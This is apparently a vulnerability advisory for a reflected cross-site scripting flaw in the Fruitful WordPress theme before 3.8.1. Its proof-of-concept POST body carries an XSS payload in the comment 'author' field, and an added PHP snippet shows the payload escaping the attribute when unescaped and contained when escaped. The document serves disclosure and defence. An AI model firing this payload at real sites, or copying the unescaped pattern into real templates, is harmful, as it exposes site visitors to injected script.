Fruitful Theme < 3.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The Fruitful WordPress theme, version 3.8 and possibly below, was affected by an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
The vulnerability was patched in version 3.8.1 of the theme, although the changelog file only mentions:
"Bug fix: Fixed issues on comment form"
Proof of Concept
Add a Cross-Site Scripting (XSS) payload to the 'Name' field of the comment section and submit the form. This will result in the following HTTP POST body:
comment=This+is+a+test+comment.&author=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22&email=&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0
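Why the quoted 'author' value matters to whoever maintains the template, as an added example that is not the theme's code and not part of the original advisory: it decodes the POST body above and renders it through a hypothetical field template, with and without attribute escaping. The names render_author_field(), attr_escape() and stays_in_attribute() are assumptions made for illustration; esc_attr() is the WordPress escaping function a theme would call.

```php
<?php
// Added example. The theme's template is not shown on the page, so
// render_author_field() is a hypothetical stand-in for a comment-form field
// that reflects the submitted name back into value="...".

// POST body quoted in the Proof of Concept.
$body = 'comment=This+is+a+test+comment.'
      . '&author=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22'
      . '&email=&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0';
parse_str($body, $post); // URL-decodes the fields, as PHP does for $_POST

// Escape for an HTML attribute. Inside WordPress this is esc_attr(); the
// fallback keeps the script runnable from the CLI without WordPress.
function attr_escape(string $value): string
{
    return function_exists('esc_attr')
        ? esc_attr($value)
        : htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_author_field(string $author, bool $escape): string
{
    $value = $escape ? attr_escape($author) : $author;
    return '<input id="author" name="author" type="text" value="' . $value . '" />';
}

// A single text field must contain exactly one '<' and one '>' (its own).
// More than that means the reflected value left the attribute and became markup.
function stays_in_attribute(string $html): bool
{
    return substr_count($html, '<') === 1 && substr_count($html, '>') === 1;
}

foreach (['unescaped' => false, 'escaped' => true] as $label => $escape) {
    $html = render_author_field($post['author'] ?? '', $escape);
    printf("%-9s contained=%s\n  %s\n", $label,
        stays_in_attribute($html) ? 'yes' : 'no', $html);
}
```

The same containment check can serve as a regression test for any template that echoes request fields back into form attributes.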
Affects Themes
Fixed in 3.8.1
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Ultra Security Team (Ashkan Moghaddas, AmirMohammad Safari)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-02-17
Added
2020-02-24
Last Updated
2020-03-13